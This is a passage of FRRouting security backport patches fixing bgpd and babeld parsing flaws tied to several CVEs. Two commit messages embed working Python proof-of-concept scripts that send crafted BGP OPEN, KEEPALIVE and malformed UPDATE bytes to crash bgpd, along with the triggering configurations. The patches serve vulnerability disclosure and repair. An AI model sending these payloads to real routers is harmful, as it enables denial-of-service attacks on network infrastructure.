if (sublength > length) {
- zlog_info(
- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d",
- sublength, length);
- bgp_notify_send_with_data(
- peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d",
+ sublength, length);
+ return bgp_attr_malformed(args,
+ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
/* alloc and copy sub-tlv */
@@ -2542,13 +2535,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
if (length) {
/* spurious leftover data */
- zlog_info(
- "Tunnel Encap attribute length is bad: %d leftover octets",
- length);
- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
- startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets",
+ length);
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
return 0;
@@ -3387,8 +3377,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
case BGP_ATTR_VNC:
#endif
case BGP_ATTR_ENCAP:
- ret = bgp_attr_encap(type, peer, length, attr, flag,
- startp);
+ ret = bgp_attr_encap(&attr_args);
break;
case BGP_ATTR_PREFIX_SID:
ret = bgp_attr_prefix_sid(&attr_args);
--
2.35.3

48
0011-babeld-fix-11808-to-avoid-infinite-loops.patch Normal file
View File

@ -0,0 +1,48 @@
From 8a8f20d89585aa490e3cae5ad705ce23107fc1fe Mon Sep 17 00:00:00 2001
From: harryreps <harryreps@gmail.com>
Date: Fri, 3 Mar 2023 23:17:14 +0000
Upsteam: yes
References: CVE-2023-3748,bsc#1213434,gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952
Subject: [PATCH] babeld: fix #11808 to avoid infinite loops
Replacing continue in loops to goto done so that index of packet buffer
increases.
Signed-off-by: harryreps <harryreps@gmail.com>
(cherry picked from commit ae1e0e1fed77716bc06f181ad68c4433fb5523d0)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/babeld/message.c b/babeld/message.c
index 7d45d91bf7..2bf2337965 100644
--- a/babeld/message.c
+++ b/babeld/message.c
@@ -439,7 +439,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received Hello from %s on %s that does not have all 0's in the unused section of flags, ignoring",
format_address(from), ifp->name);
- continue;
+ goto done;
}
/*
@@ -451,7 +451,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received Unicast Hello from %s on %s that FRR is not prepared to understand yet",
format_address(from), ifp->name);
- continue;
+ goto done;
}
DO_NTOHS(seqno, message + 4);
@@ -469,7 +469,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received hello from %s on %s should be ignored as that this version of FRR does not know how to properly handle interval == 0",
format_address(from), ifp->name);
- continue;
+ goto done;
}
changed = update_neighbour(neigh, seqno, interval);
--
2.35.3

37
0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch Normal file
View File

@ -0,0 +1,37 @@
From 168204de6371f594c4f1ebac30ca3e181a851e39 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Wed, 5 Apr 2023 14:57:05 -0400
Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit
withdrawal
Upsteam: yes
References: CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8
All other parsing functions done from bgp_nlri_parse() assume
no attributes == an implicit withdrawal. Let's move
bgp_nlri_parse_flowspec() into the same alignment.
Reported-by: Matteo Memelli <mmemelli@amazon.it>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
index 39c0cfe514..fe1f0d50f8 100644
--- a/bgpd/bgp_flowspec.c
+++ b/bgpd/bgp_flowspec.c
@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
afi = packet->afi;
safi = packet->safi;
+ /*
+ * All other AFI/SAFI's treat no attribute as a implicit
+ * withdraw. Flowspec should as well.
+ */
+ if (!attr)
+ withdraw = 1;
+
if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) {
flog_err(EC_BGP_FLOWSPEC_PACKET,
"BGP flowspec nlri length maximum reached (%u)",
--
2.35.3

115
0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch Normal file
View File

@ -0,0 +1,115 @@
From 1fdbfffbe343ad63c32ff37998300b0b4f67d8fb Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Mon, 23 Oct 2023 23:34:10 +0300
Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE
message
Upstream: yes
References: CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4
If we send a crafted BGP UPDATE message without mandatory attributes, we do
not check if the length of the path attributes is zero or not. We only check
if attr->flag is at least set or not. Imagine we send only unknown transit
attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
capability is received.
A crash:
```
bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16)
bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17
BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting...
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d]
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593]
BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181]
BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980]
BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a]
BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290]
BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610]
BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5]
BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867]
BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6]
BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597]
BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3]
BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0]
BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979]
```
Sending:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(1000)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit d8482bf011cb2b173e85b65b4bf3d5061250cdb9)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 188393b752..5c028c854c 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3098,13 +3098,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args)
}
/* Well-known attribute check. */
-static int bgp_attr_check(struct peer *peer, struct attr *attr)
+static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ bgp_size_t length)
{
uint8_t type = 0;
/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
* empty UPDATE. */
- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
+ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
+ !length)
return BGP_ATTR_PARSE_PROCEED;
/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
@@ -3156,7 +3158,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
enum bgp_attr_parse_ret ret;
uint8_t flag = 0;
uint8_t type = 0;
- bgp_size_t length;
+ bgp_size_t length = 0;
uint8_t *startp, *endp;
uint8_t *attr_endp;
uint8_t seen[BGP_ATTR_BITMAP_SIZE];
@@ -3478,7 +3480,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
}
/* Check all mandatory well-known attributes are present */
- ret = bgp_attr_check(peer, attr);
+ ret = bgp_attr_check(peer, attr, length);
if (ret < 0)
goto done;
--
2.35.3

121
0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch Normal file
View File

@ -0,0 +1,121 @@
From f2bc4e6847b222ed8fbd460fbba9aa69d1bf8d0e Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 20 Oct 2023 17:49:18 +0300
Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session
reset
Upstream: yes
References: CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35
Avoid crashing bgpd.
```
(gdb)
bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341
2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN);
(gdb)
stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320
320 {
(gdb)
321 STREAM_VERIFY_SANE(s);
(gdb)
323 if (STREAM_READABLE(s) < size) {
(gdb)
34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
(gdb)
Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault.
0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050,
object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282
2282 if (path->attr->aspath->refcnt)
(gdb)
```
With the configuration:
```
neighbor 127.0.0.1 remote-as external
neighbor 127.0.0.1 passive
neighbor 127.0.0.1 ebgp-multihop
neighbor 127.0.0.1 disable-connected-check
neighbor 127.0.0.1 update-source 127.0.0.2
neighbor 127.0.0.1 timers 3 90
neighbor 127.0.0.1 timers connect 1
address-family ipv4 unicast
redistribute connected
neighbor 127.0.0.1 default-originate
neighbor 127.0.0.1 route-map RM_IN in
exit-address-family
!
route-map RM_IN permit 10
set as-path prepend 200
exit
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit b08afc81c60607a4f736f418f2e3eb06087f1a35)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 5c028c854c..42a2342f6f 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -2224,7 +2224,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args,
mp_update->afi = afi;
mp_update->safi = safi;
- return BGP_ATTR_PARSE_EOR;
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);
}
mp_update->afi = afi;
@@ -3405,10 +3405,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
goto done;
}
- if (ret == BGP_ATTR_PARSE_EOR) {
- goto done;
- }
-
if (ret == BGP_ATTR_PARSE_ERROR) {
flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR,
"%s: Attribute %s, parse error", peer->host,
diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
index 4963ea64d0..23767153b2 100644
--- a/bgpd/bgp_attr.h
+++ b/bgpd/bgp_attr.h
@@ -382,7 +382,6 @@ enum bgp_attr_parse_ret {
/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
*/
BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
- BGP_ATTR_PARSE_EOR = -4,
};
struct bpacket_attr_vec_arr;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 1ef421028f..20c642190b 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -2027,8 +2027,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
* Non-MP IPv4/Unicast EoR is a completely empty UPDATE
* and MP EoR should have only an empty MP_UNREACH
*/
- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0)
- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) {
+ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) {
afi_t afi = 0;
safi_t safi;
struct graceful_restart_info *gr_info;
@@ -2049,9 +2048,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
&& nlris[NLRI_MP_WITHDRAW].length == 0) {
afi = nlris[NLRI_MP_WITHDRAW].afi;
safi = nlris[NLRI_MP_WITHDRAW].safi;
- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) {
- afi = nlris[NLRI_MP_UPDATE].afi;
- safi = nlris[NLRI_MP_UPDATE].safi;
}
if (afi && peer->afc[afi][safi]) {
--
2.35.3

109
0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch Normal file
View File

@ -0,0 +1,109 @@
From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 27 Oct 2023 11:56:45 +0300
Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of
malformed attrs
Upstream: yes
CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b
Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
processed as a normal UPDATE without mandatory attributes, that could lead
to harmful behavior. In this case, a crash for route-maps with the configuration
such as:
```
router bgp 65001
no bgp ebgp-requires-policy
neighbor 127.0.0.1 remote-as external
neighbor 127.0.0.1 passive
neighbor 127.0.0.1 ebgp-multihop
neighbor 127.0.0.1 disable-connected-check
neighbor 127.0.0.1 update-source 127.0.0.2
neighbor 127.0.0.1 timers 3 90
neighbor 127.0.0.1 timers connect 1
!
address-family ipv4 unicast
neighbor 127.0.0.1 addpath-tx-all-paths
neighbor 127.0.0.1 default-originate
neighbor 127.0.0.1 route-map RM_IN in
exit-address-family
exit
!
route-map RM_IN permit 10
set as-path prepend 200
exit
```
Send a malformed optional transitive attribute:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(100)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 42a2342f6f..fc92dbb326 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
uint8_t type = 0;
/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
- * empty UPDATE. */
+ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
+ * we will pass it to be processed as a normal UPDATE without mandatory
+ * attributes, that could lead to harmful behavior.
+ */
if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
!length)
- return BGP_ATTR_PARSE_PROCEED;
+ return BGP_ATTR_PARSE_WITHDRAW;
/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
@@ -3532,7 +3535,13 @@ done:
aspath_unintern(&as4_path);
transit = bgp_attr_get_transit(attr);
- if (ret != BGP_ATTR_PARSE_ERROR) {
+ /* If we received an UPDATE with mandatory attributes, then
+ * the unrecognized transitive optional attribute of that
+ * path MUST be passed. Otherwise, it's an error, and from
+ * security perspective it might be very harmful if we continue
+ * here with the unrecognized attributes.
+ */
+ if (ret == BGP_ATTR_PARSE_PROCEED) {
/* Finally intern unknown attribute. */
if (transit)
bgp_attr_set_transit(attr, transit_intern(transit));
--
2.35.3

90
0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch Normal file
View File

@ -0,0 +1,90 @@
From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Sun, 29 Oct 2023 22:44:45 +0200
Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI
Upstream: yes
CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf
If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
no mandatory path attributes received.
In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
as a new data, but without mandatory attributes, it's a malformed packet.
In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
handle that.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index fc92dbb326..ae0f052c42 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
!length)
return BGP_ATTR_PARSE_WITHDRAW;
- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
- are present, it should. Check for any other attribute being present
- instead.
- */
- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
- return BGP_ATTR_PARSE_PROCEED;
-
if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
type = BGP_ATTR_ORIGIN;
@@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
&& !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
type = BGP_ATTR_LOCAL_PREF;
+ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required
+ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
+ * are present, it should. Check for any other attribute being present
+ * instead.
+ */
+ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
+ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
+ : BGP_ATTR_PARSE_PROCEED;
+
/* If any of the well-known mandatory attributes are not present
* in an UPDATE message, then "treat-as-withdraw" MUST be used.
*/
diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
index 23767153b2..27708c0689 100644
--- a/bgpd/bgp_attr.h
+++ b/bgpd/bgp_attr.h
@@ -382,6 +382,7 @@ enum bgp_attr_parse_ret {
/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
*/
BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+ BGP_ATTR_PARSE_MISSING_MANDATORY = -4,
};
struct bpacket_attr_vec_arr;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 20c642190b..b175a26ab9 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
/* Network Layer Reachability Information. */
update_len = end - stream_pnt(s);
- if (update_len && attribute_len) {
+ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
+ * NLRIs should be handled as a new data. Though, if we received
+ * NLRIs without mandatory attributes, they should be ignored.
+ */
+ if (update_len && attribute_len &&
+ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
/* Set NLRI portion to structure. */
nlris[NLRI_UPDATE].afi = AFI_IP;
nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
--
2.35.3

58
0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch Normal file
View File

@ -0,0 +1,58 @@
From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Fri, 3 Mar 2023 21:58:33 -0500
Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing
Upstream: yes
CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f
Fixes a couple crashes associated with attempting to read
beyond the end of the stream.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
(cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c
index 38f34a8927..64d1ff70ca 100644
--- a/bgpd/bgp_label.c
+++ b/bgpd/bgp_label.c
@@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen,
uint8_t llen = 0;
uint8_t label_depth = 0;
+ if (plen < BGP_LABEL_BYTES)
+ return 0;
+
for (; data < lim; data += BGP_LABEL_BYTES) {
memcpy(label, data, BGP_LABEL_BYTES);
llen += BGP_LABEL_BYTES;
@@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN);
addpath_id = ntohl(addpath_id);
pnt += BGP_ADDPATH_ID_LEN;
+
+ if (pnt >= lim)
+ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
}
/* Fetch prefix length. */
@@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
/* Fill in the labels */
llen = bgp_nlri_get_labels(peer, pnt, psize, &label);
+ if (llen == 0) {
+ flog_err(
+ EC_BGP_UPDATE_RCV,
+ "%s [Error] Update packet error (wrong label length 0)",
+ peer->host);
+ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR,
+ BGP_NOTIFY_UPDATE_INVAL_NETWORK);
+ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH;
+ }
p.prefixlen = prefixlen - BSIZE(llen);
/* There needs to be at least one label */
--
2.35.3

37
0018-bgpd-Flowspec-overflow-issue.patch Normal file
View File

@ -0,0 +1,37 @@
From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Thu, 23 Feb 2023 13:29:32 -0500
Subject: [PATCH] bgpd: Flowspec overflow issue
Upstream: yes
CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3
According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>>
Specifying 0 as a length makes BGP get all warm on the inside. Which
in this case is not a good thing at all. Prevent warmth, stay cold
on the inside.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
index fe1f0d50f8..98ec1ed073 100644
--- a/bgpd/bgp_flowspec.c
+++ b/bgpd/bgp_flowspec.c
@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
psize);
return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
}
+
+ if (psize == 0) {
+ flog_err(EC_BGP_FLOWSPEC_PACKET,
+ "Flowspec NLRI length 0 which makes no sense");
+ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ }
+
if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) {
flog_err(
EC_BGP_FLOWSPEC_PACKET,
--
2.35.3

121
0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch Normal file
View File

@ -0,0 +1,121 @@
From 51679e4504546584d98673b76ed8e12a8bc74fe0 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Wed, 27 Mar 2024 18:42:56 +0200
Subject: [PATCH 1/2] bgpd: Fix error handling when receiving BGP Prefix SID
attribute
References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628
Without this patch, we always set the BGP Prefix SID attribute flag without
checking if it's malformed or not. RFC8669 says that this attribute MUST be discarded.
Also, this fixes the bgpd crash when a malformed Prefix SID attribute is received,
with malformed transitive flags and/or TLVs.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit ba6a8f1a31e1a88df2de69ea46068e8bd9b97138)
---
bgpd/bgp_attr.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 7144c4bfa73d..2e2845b8fa7e 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1400,6 +1400,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
case BGP_ATTR_AS4_AGGREGATOR:
case BGP_ATTR_AGGREGATOR:
case BGP_ATTR_ATOMIC_AGGREGATE:
+ case BGP_ATTR_PREFIX_SID:
return BGP_ATTR_PARSE_PROCEED;
/* Core attributes, particularly ones which may influence route
@@ -3146,8 +3147,6 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args)
struct attr *const attr = args->attr;
enum bgp_attr_parse_ret ret;
- attr->flag |= ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID);
-
uint8_t type;
uint16_t length;
size_t headersz = sizeof(type) + sizeof(length);
@@ -3197,6 +3196,8 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args)
}
}
+ SET_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID));
+
return BGP_ATTR_PARSE_PROCEED;
}
From 9240abccb564043c85180916b77cad5b194a49c9 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Wed, 27 Mar 2024 19:08:38 +0200
Subject: [PATCH 2/2] bgpd: Prevent from one more CVE triggering this place
References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628
Upstream: submitted
If we receive an attribute that is handled by bgp_attr_malformed(), use
